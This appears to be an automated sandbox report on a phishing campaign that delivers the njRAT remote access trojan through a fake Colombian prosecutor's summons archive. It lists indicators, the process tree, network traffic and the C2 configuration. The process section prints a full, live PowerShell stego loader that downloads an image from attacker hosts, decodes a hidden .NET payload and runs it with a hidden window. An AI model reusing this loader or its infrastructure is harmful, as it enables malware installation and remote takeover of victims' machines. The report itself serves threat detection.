URL:

https://servicioselectronicos22.lt.acemlnc.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZjZG4uZGlzY29yZGFwcC5jb20lMkZhdHRhY2htZW50cyUyRjEyMDgwNDY1NTg5NzM3OTIzMjklMkYxMjIwMzM3MzQ4MDM0ODI2MjYwJTJGRklTQ0FMSUFfQ0lUQUNJT05FUy1QREYudGFyJTNGZXglM0Q2NjBlOTJiOCUyNmlzJTNENjVmYzFkYjglMjZobSUzRDcwYWQyZDViMGU1ODRkOWZiNTQxMjczNmYyZWEwZTc5ZTEwOTQwYTNlZGU2N2FiNTczYzIyOTUwNmQzNjRiNDclMjY=&sig=FhxubgPtUu9JCK1gwh6M2hh5MwTmoAM7wTipiAP3SRqg&iat=1711023987&a=%7C%7C28533470%7C%7C&account=servicioselectronicos22%2Eactivehosted%2Ecom&email=KAlmcUlQuqdBrJoLbrhAm3b9rwLswrACWOVmBt3EFypWyrCXhbsYMQinlHQubfjmKMljIhEgSqQ%3D%3ApJ58ZDz4j0B8v1es0iYoL0DMrRuL64gI&s=08d8f5642c2eddc64e297ba1c032dd0e&i=5A11A2A17

Full analysis: https://app.any.run/tasks/1d33daff-b25e-4755-a8a5-3a729e21c947
Verdict: Malicious activity
Threats:

njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market that features an abundance of educational information. Interested attackers can even find tutorials on YouTube. This allows it to become one of the most popular RATs in the world.

Malware Trends Tracker     >>>
Analysis date: March 21, 2024, 17:22:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
stegocampaign
rat
njrat
bladabindi
remote
Indicators:
MD5:

794FF856E8FEA700DF734AC6E777BCC0

SHA1:

3C9D6AAB66EA573F0A08B82EE74374C82148355B

SHA256:

FBD55EF10B87C47254F074BF8EB7AF568BA7E719FCEC3175D5AE1559BE9F6083

SSDEEP:

12:2lQN3WUxfzIEn59+pwzeoefUYiD1GOc81j+v3zVpGcSdL9am6wyNNUj8b:2MTBhT+pwvewc6O3qDP6wy7Vb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 1216)

    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 1216)

    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 1216)

    • Changes powershell execution policy (Bypass)

      • wscript.exe (PID: 1216)
      • powershell.exe (PID: 3312)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3312)
      • powershell.exe (PID: 2192)
      • powershell.exe (PID: 1656)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3312)
      • powershell.exe (PID: 2192)

    • Stego campaign has been detected

      • powershell.exe (PID: 3312)

    • Unusual connection from system programs

      • wscript.exe (PID: 1216)

    • Drops the executable file immediately after the start

      • Skype-Setup.exe (PID: 324)
      • Skype-Setup.exe (PID: 2332)

    • NjRAT is detected

      • AddInProcess32.exe (PID: 3344)

    • NJRAT has been detected (YARA)

      • AddInProcess32.exe (PID: 3344)

    • Connects to the CnC server

      • AddInProcess32.exe (PID: 3344)

    • NJRAT has been detected (SURICATA)

      • AddInProcess32.exe (PID: 3344)

  • SUSPICIOUS

    • Reads the Internet Settings

      • wscript.exe (PID: 1216)
      • powershell.exe (PID: 2192)
      • Skype.exe (PID: 548)
      • Skype-Setup.tmp (PID: 3304)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 1216)
      • powershell.exe (PID: 3312)
      • powershell.exe (PID: 2192)

    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 1216)
      • powershell.exe (PID: 3312)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 1216)

    • Application launched itself

      • powershell.exe (PID: 3312)
      • Skype.exe (PID: 548)
      • powershell.exe (PID: 2192)

    • Found IP address in command line

      • powershell.exe (PID: 2192)

    • Probably download files using WebClient

      • powershell.exe (PID: 3312)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 2192)

    • Unusual connection from system programs

      • powershell.exe (PID: 2192)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 1216)

    • Executable content was dropped or overwritten

      • Skype-Setup.exe (PID: 324)
      • Skype-Setup.exe (PID: 2332)

    • Reads the Windows owner or organization settings

      • Skype-Setup.tmp (PID: 3304)

    • Searches for installed software

      • Skype-Setup.tmp (PID: 3304)

    • Uses TASKKILL.EXE to kill process

      • Skype-Setup.tmp (PID: 3304)

    • Reads security settings of Internet Explorer

      • Skype-Setup.tmp (PID: 3304)

    • Non-standard symbols in registry

      • Skype-Setup.tmp (PID: 3304)

    • Connects to unusual port

      • AddInProcess32.exe (PID: 3344)

  • INFO

    • Manual execution by a user

      • WinRAR.exe (PID: 568)
      • explorer.exe (PID: 1992)
      • wscript.exe (PID: 1216)
      • WinRAR.exe (PID: 1584)
      • WinRAR.exe (PID: 2560)
      • Skype.exe (PID: 548)
      • notepad++.exe (PID: 3488)

    • The process uses the downloaded file

      • iexplore.exe (PID: 1696)
      • WinRAR.exe (PID: 568)

    • Modifies the phishing filter of IE

      • iexplore.exe (PID: 1696)

    • Application launched itself

      • iexplore.exe (PID: 1696)

    • Checks supported languages

      • Skype.exe (PID: 548)
      • Skype.exe (PID: 2740)
      • Skype.exe (PID: 3136)
      • Skype.exe (PID: 3044)
      • Skype-Setup.exe (PID: 324)
      • Skype.exe (PID: 3844)
      • Skype-Setup.tmp (PID: 3060)
      • Skype-Setup.tmp (PID: 3304)
      • Skype.exe (PID: 2524)
      • Skype-Setup.exe (PID: 2332)
      • AddInProcess32.exe (PID: 3344)

    • Reads Environment values

      • Skype.exe (PID: 548)

    • Reads product name

      • Skype.exe (PID: 548)

    • Reads the computer name

      • Skype.exe (PID: 3136)
      • Skype.exe (PID: 3044)
      • Skype-Setup.tmp (PID: 3060)
      • Skype.exe (PID: 3844)
      • Skype.exe (PID: 548)
      • Skype-Setup.tmp (PID: 3304)
      • Skype.exe (PID: 2524)
      • AddInProcess32.exe (PID: 3344)

    • Create files in a temporary directory

      • Skype-Setup.exe (PID: 324)
      • Skype-Setup.exe (PID: 2332)
      • Skype-Setup.tmp (PID: 3304)

    • Creates files or folders in the user directory

      • Skype.exe (PID: 548)

    • Reads CPU info

      • Skype.exe (PID: 548)

    • Creates files in the program directory

      • powershell.exe (PID: 1656)

    • Reads the machine GUID from the registry

      • AddInProcess32.exe (PID: 3344)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

NjRat

(PID) Process(3344) AddInProcess32.exe
C2junio2023.duckdns.org
Ports3333
BotnetNYAN CAT
Options
Auto-run registry keySoftware\Microsoft\Windows\CurrentVersion\Run\7952b2688d
Splitter@!#&^%$
Version0.7NC
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
72
Monitored processes
23
Malicious processes
6
Suspicious processes
2

Behavior graph

Click at the process to see the details
start iexplore.exe no specs iexplore.exe explorer.exe no specs winrar.exe no specs winrar.exe no specs winrar.exe no specs wscript.exe #STEGOCAMPAIGN powershell.exe no specs powershell.exe skype.exe skype.exe skype.exe no specs skype.exe no specs skype-setup.exe skype.exe no specs skype-setup.tmp no specs skype.exe no specs skype-setup.exe skype-setup.tmp no specs taskkill.exe no specs powershell.exe no specs #NJRAT addinprocess32.exe notepad++.exe

Process information

PID
CMD
Path
Indicators
Parent process
324"C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Skype-Setup.exe" /silent !desktopiconC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Skype-Setup.exe
Skype.exe
User:
admin
Company:
Skype Technologies S.A.
Integrity Level:
MEDIUM
Description:
Skype Setup
Exit code:
5
Version:
8.110.0.218
Modules
Images
c:\users\admin\appdata\roaming\microsoft\skype for desktop\skype-setup.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
548"C:\Program Files\Microsoft\Skype for Desktop\Skype.exe" --share-file="C:\Users\admin\Downloads\FISCALIA_CITACIONES-PDF\INFORMACION DETALLADA PROCESO DE CITACION FISCALIA DETALLES RADICADO No 2024-663259-998569-99659-PDF.vbs"C:\Program Files\Microsoft\Skype for Desktop\Skype.exe
explorer.exe
User:
admin
Company:
Skype Technologies S.A.
Integrity Level:
MEDIUM
Description:
Skype
Exit code:
1
Version:
8.110.0.215
Modules
Images
c:\program files\microsoft\skype for desktop\skype.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\skype for desktop\ffmpeg.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
568"C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -- "C:\Users\admin\Downloads\FISCALIA_CITACIONES-PDF.tar" "?\"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
1216"C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\FISCALIA_CITACIONES-PDF\INFORMACION DETALLADA PROCESO DE CITACION FISCALIA DETALLES RADICADO No 2024-663259-998569-99659-PDF.vbs" C:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1584"C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -- "C:\Users\admin\Downloads\FISCALIA_CITACIONES-PDF\INFORMACION DETALLADA PROCESO DE CITACION FISCALIA DETALLES RADICADO No 2024-663259-998569-99659-PDF.tar.part1.rar" C:\Users\admin\Downloads\FISCALIA_CITACIONES-PDF\C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
1656"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbsC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1696"C:\Program Files\Internet Explorer\iexplore.exe" "https://servicioselectronicos22.lt.acemlnc.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZjZG4uZGlzY29yZGFwcC5jb20lMkZhdHRhY2htZW50cyUyRjEyMDgwNDY1NTg5NzM3OTIzMjklMkYxMjIwMzM3MzQ4MDM0ODI2MjYwJTJGRklTQ0FMSUFfQ0lUQUNJT05FUy1QREYudGFyJTNGZXglM0Q2NjBlOTJiOCUyNmlzJTNENjVmYzFkYjglMjZobSUzRDcwYWQyZDViMGU1ODRkOWZiNTQxMjczNmYyZWEwZTc5ZTEwOTQwYTNlZGU2N2FiNTczYzIyOTUwNmQzNjRiNDclMjY=&sig=FhxubgPtUu9JCK1gwh6M2hh5MwTmoAM7wTipiAP3SRqg&iat=1711023987&a=%7C%7C28533470%7C%7C&account=servicioselectronicos22%2Eactivehosted%2Ecom&email=KAlmcUlQuqdBrJoLbrhAm3b9rwLswrACWOVmBt3EFypWyrCXhbsYMQinlHQubfjmKMljIhEgSqQ%3D%3ApJ58ZDz4j0B8v1es0iYoL0DMrRuL64gI&s=08d8f5642c2eddc64e297ba1c032dd0e&i=5A11A2A17"C:\Program Files\Internet Explorer\iexplore.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
1992"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2192"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/739/227/original/new_image.jpg?1707826222', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('0/Lp1IW/d/ee.etsap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','AddInProcess32',''))} }"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2332"C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Skype-Setup.exe" /SPAWNWND=$12014E /NOTIFYWND=$1001F6 /silent !desktopiconC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Skype-Setup.exe
Skype-Setup.tmp
User:
admin
Company:
Skype Technologies S.A.
Integrity Level:
HIGH
Description:
Skype Setup
Exit code:
5
Version:
8.110.0.218
Modules
Images
c:\users\admin\appdata\roaming\microsoft\skype for desktop\skype-setup.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
Total events
34 952
Read events
34 760
Write events
159
Delete events
33

Modification events

(PID) Process:(1696) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
Operation:writeName:NTPDaysSinceLastAutoMigration
Value:
1
(PID) Process:(1696) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
Operation:writeName:NTPLastLaunchLowDateTime
Value:
(PID) Process:(1696) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
Operation:writeName:NTPLastLaunchHighDateTime
Value:
31095732
(PID) Process:(1696) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
Operation:writeName:NextCheckForUpdateLowDateTime
Value:
(PID) Process:(1696) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
Operation:writeName:NextCheckForUpdateHighDateTime
Value:
31095732
(PID) Process:(1696) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(1696) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(1696) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1696) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(1696) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
Executable files
2
Suspicious files
22
Text files
8
Unknown types
9

Dropped files

PID
Process
Filename
Type
3960iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62binary
MD5:E72B3CFDEC97702CF5659E20BC0A7EED
SHA256:486C27938A577472C0EDC1AC274E6AF3A59FDDAADF26B68B94B3BFAD2A4D0019
3960iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62der
MD5:FDF5182801345D5C8B74EECE573E312B
SHA256:24A7EDBC86141CBEA219671DA0CB371A6BDF51BB3505E76D196E53B9B9956872
3960iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894binary
MD5:3D5DFC634E14250BB16BA321C55A4C92
SHA256:A8D616746B1215E0F1B93AFE7921D80745877EC04A2F83EEFAD9FE958A48E8AC
3960iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_645BC4A49DCDC40FE5917FA45C6D4517binary
MD5:C69095E576D08B84AB7F70E999E292CB
SHA256:21A834FF786D819AA92715A2C1C1F3D7AEC4FE8E3D938BB4F6F25A2E10E7077D
3960iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\83D863F495E7D991917B3ABB3E1EB382_1CF3CD648CFFE038A8327ADAF3322CD2der
MD5:EFA5D5A6945335FFE1746E9CED57114E
SHA256:846AEA23794964605EBD99A0E557BDB07B975F3C6261A9ACD25E97D2945B0F0F
3960iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894der
MD5:735B6F3EA50B9B723DF5FCE3A237395D
SHA256:44C695039CBC1E44238AE4C1140C01A9711C33DFCC18F594BD4A318FF3DDCE40
1696iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{A802632F-E7A7-11EE-AE0A-12A9866C77DE}.datbinary
MD5:6089F81DBE1CB6669727FDD08788F201
SHA256:94043B393E64C82FDD28E4A16E335444F0AA8B350F6286FF3EF7BA40917A6A8B
3960iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MFAQUS6V\FISCALIA_CITACIONES-PDF[1].tarcompressed
MD5:59899999C9A828EC8C6FCF5D12A011AD
SHA256:F5DEE7C34704B3650F3C4ABA1BA8A568D47BC37586C4B8BD9B2734ACA42881A8
3960iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27binary
MD5:F198A0CAA9708D5390B63B33A87A33DD
SHA256:BDC5CDEE984C627F93C2136FA07D66B5278532463D81976FAC2FD05EE1DC0D97
1696iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFED4AD8B0C2E4F049.TMPbinary
MD5:0B01C57810212B2AF8ACE061621B88B7
SHA256:7B5B46BF6C7CE0123E3D8892D5F07ABA093E7D446FEEF094609109D0FF6346C4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
25
DNS requests
18
Threats
20

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3960
iexplore.exe
GET
304
88.221.110.106:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f45bb2f3c9a14db9
unknown
unknown
3960
iexplore.exe
GET
304
88.221.110.106:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?36ca310eb28aaa33
unknown
unknown
3960
iexplore.exe
GET
200
108.138.2.10:80
http://o.ss2.us//MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D
unknown
binary
2.02 Kb
unknown
3960
iexplore.exe
GET
200
18.245.39.64:80
http://ocsp.rootg2.amazontrust.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D
unknown
binary
1.49 Kb
unknown
3960
iexplore.exe
GET
200
18.245.39.64:80
http://ocsp.rootca1.amazontrust.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwdzEkzUBtJnwJkc3SmanzgxeYU%3D
unknown
binary
1.37 Kb
unknown
3960
iexplore.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D
unknown
binary
1.47 Kb
unknown
1080
svchost.exe
GET
304
2.16.100.152:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?e2ddf83a2417bb20
unknown
compressed
67.5 Kb
unknown
3960
iexplore.exe
GET
200
18.173.208.27:80
http://ocsp.r2m03.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQqHI%2BsdmapawQncL1rpCEZZ8gTSAQUVdkYX9IczAHhWLS%2Bq9lVQgHXLgICEARXBmF0edQaVZNxqATVgMU%3D
unknown
binary
471 b
unknown
1080
svchost.exe
GET
200
2.16.100.152:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e90c163b6659448e
unknown
compressed
67.5 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
3960
iexplore.exe
44.214.122.29:443
servicioselectronicos22.lt.acemlnc.com
AMAZON-AES
US
unknown
3960
iexplore.exe
88.221.110.106:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
unknown
3960
iexplore.exe
108.138.2.10:80
o.ss2.us
AMAZON-02
US
unknown
3960
iexplore.exe
18.245.39.64:80
ocsp.rootg2.amazontrust.com
US
unknown
3960
iexplore.exe
18.173.208.27:80
ocsp.r2m03.amazontrust.com
US
unknown
3960
iexplore.exe
162.159.135.233:443
cdn.discordapp.com
CLOUDFLARENET
shared
3960
iexplore.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
servicioselectronicos22.lt.acemlnc.com
  • 44.214.122.29
  • 3.220.97.117
  • 54.172.156.139
unknown
ctldl.windowsupdate.com
  • 88.221.110.106
  • 2.16.100.171
  • 2.16.100.177
  • 2.16.100.138
  • 2.16.100.152
  • 88.221.110.65
  • 2.16.100.169
whitelisted
o.ss2.us
  • 108.138.2.10
  • 108.138.2.195
  • 108.138.2.173
  • 108.138.2.107
whitelisted
ocsp.rootg2.amazontrust.com
  • 18.245.39.64
whitelisted
ocsp.rootca1.amazontrust.com
  • 18.245.39.64
shared
ocsp.r2m03.amazontrust.com
  • 18.173.208.27
unknown
cdn.discordapp.com
  • 162.159.135.233
  • 162.159.134.233
  • 162.159.130.233
  • 162.159.133.233
  • 162.159.129.233
shared
ocsp.digicert.com
  • 192.229.221.95
whitelisted
paste.ee
  • 188.114.96.3
  • 188.114.97.3
shared
uploaddeimagens.com.br
  • 188.114.97.3
  • 188.114.96.3
shared

Threats

PID
Process
Class
Message
1080
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)
3960
iexplore.exe
Misc activity
ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
3960
iexplore.exe
Misc activity
ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
1216
wscript.exe
Potential Corporate Privacy Violation
ET POLICY Pastebin-style Service (paste .ee) in TLS SNI
2192
powershell.exe
Potential Corporate Privacy Violation
ET POLICY Pastebin-style Service (paste .ee) in TLS SNI
1080
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
1080
svchost.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3344
AddInProcess32.exe
Malware Command and Control Activity Detected
ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
3344
AddInProcess32.exe
Malware Command and Control Activity Detected
ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
1080
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
7 ETPRO signatures available at the full report
Process
Message
Skype.exe
